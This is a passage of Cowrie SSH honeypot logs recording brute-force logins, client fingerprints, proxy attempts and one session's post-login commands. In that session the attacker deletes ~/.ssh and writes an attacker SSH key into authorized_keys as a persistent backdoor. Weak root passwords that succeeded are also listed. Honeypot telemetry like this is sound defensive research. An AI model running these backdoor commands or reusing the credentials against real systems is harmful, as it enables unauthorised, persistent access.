c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:20:02.383927Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab147258","message":"login attempt [root/Ab147258] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:20:03.525545Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:20:04.091845Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:20:04.092579Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:20:04.093527Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:04.369902Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:04.820212Z","src_ip":"212.227.235.229","session":"d917ae9ff509"}
{"eventid":"cowrie.session.closed","duration":180.28555965423584,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:04.825383Z","src_ip":"212.227.235.229","session":"d917ae9ff509"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:20:05.025534Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:20:05.026220Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:20:05.302986Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:05.303877Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57394,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9894cfe8fff","protocol":"ssh","message":"New connection: 212.227.235.229:57394 (1.2.3.4:22) [session: b9894cfe8fff]","sensor":"my-vps","timestamp":"2025-08-26T04:20:05.577936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:20:05.578588Z","src_ip":"212.227.235.229","session":"b9894cfe8fff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:20:05.855296Z","src_ip":"212.227.235.229","session":"b9894cfe8fff"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:20:07.004295Z","src_ip":"212.227.235.229","session":"b9894cfe8fff"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:08.283174Z","src_ip":"212.227.235.229","session":"b9894cfe8fff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57410,"dst_ip":"1.2.3.4","dst_port":22,"session":"c268221b69a3","protocol":"ssh","message":"New connection: 212.227.235.229:57410 (1.2.3.4:22) [session: c268221b69a3]","sensor":"my-vps","timestamp":"2025-08-26T04:20:08.570416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:20:08.571383Z","src_ip":"212.227.235.229","session":"c268221b69a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:20:08.858751Z","src_ip":"212.227.235.229","session":"c268221b69a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:20:10.047858Z","src_ip":"212.227.235.229","session":"c268221b69a3"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:10.336414Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:10.337528Z","src_ip":"212.227.235.229","session":"c268221b69a3"}
{"eventid":"cowrie.session.connect","src_ip":"147.185.132.192","src_port":61156,"dst_ip":"1.2.3.4","dst_port":22,"session":"3baac5edcc4b","protocol":"ssh","message":"New connection: 147.185.132.192:61156 (1.2.3.4:22) [session: 3baac5edcc4b]","sensor":"my-vps","timestamp":"2025-08-26T04:20:12.517878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T04:20:13.260062Z","src_ip":"147.185.132.192","session":"3baac5edcc4b"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T04:20:14.250880Z","src_ip":"147.185.132.192","session":"3baac5edcc4b"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:19.859422Z","src_ip":"147.185.132.192","session":"3baac5edcc4b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5743,"dst_ip":"1.2.3.4","dst_port":22,"session":"74b582e70221","protocol":"ssh","message":"New connection: 213.209.150.239:5743 (1.2.3.4:22) [session: 74b582e70221]","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.202958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.212801Z","src_ip":"213.209.150.239","session":"74b582e70221"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.259811Z","src_ip":"213.209.150.239","session":"74b582e70221"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.541981Z","src_ip":"213.209.150.239","session":"74b582e70221"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":20562,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:20562","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.599647Z","session":"74b582e70221"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.656496Z","src_ip":"213.209.150.239","session":"74b582e70221"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":29603,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29603","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.811168Z","session":"74b582e70221"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.867779Z","src_ip":"213.209.150.239","session":"74b582e70221"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:20.925579Z","src_ip":"213.209.150.239","session":"74b582e70221"}
{"eventid":"cowrie.session.connect","src_ip":"107.189.19.100","src_port":60138,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bfa4dba2895","protocol":"ssh","message":"New connection: 107.189.19.100:60138 (1.2.3.4:22) [session: 4bfa4dba2895]","sensor":"my-vps","timestamp":"2025-08-26T04:20:43.625475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:20:46.683268Z","src_ip":"107.189.19.100","session":"4bfa4dba2895"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:20:46.684593Z","src_ip":"107.189.19.100","session":"4bfa4dba2895"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":33006,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed81707e47c0","protocol":"ssh","message":"New connection: 103.217.145.104:33006 (1.2.3.4:22) [session: ed81707e47c0]","sensor":"my-vps","timestamp":"2025-08-26T04:20:50.483249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:20:50.484565Z","src_ip":"103.217.145.104","session":"ed81707e47c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:20:50.753821Z","src_ip":"103.217.145.104","session":"ed81707e47c0"}
{"eventid":"cowrie.login.failed","username":"dzq","password":"dzq","message":"login attempt [dzq/dzq] failed","sensor":"my-vps","timestamp":"2025-08-26T04:20:52.145402Z","src_ip":"103.217.145.104","session":"ed81707e47c0"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:20:53.878484Z","src_ip":"103.217.145.104","session":"ed81707e47c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei12#$","message":"login attempt [root/Huawei12#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:20:58.884439Z","src_ip":"107.189.19.100","session":"4bfa4dba2895"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":37554,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b1586ca721b","protocol":"ssh","message":"New connection: 139.19.117.131:37554 (1.2.3.4:22) [session: 3b1586ca721b]","sensor":"my-vps","timestamp":"2025-08-26T04:21:02.878794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:21:02.879701Z","src_ip":"139.19.117.131","session":"3b1586ca721b"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes1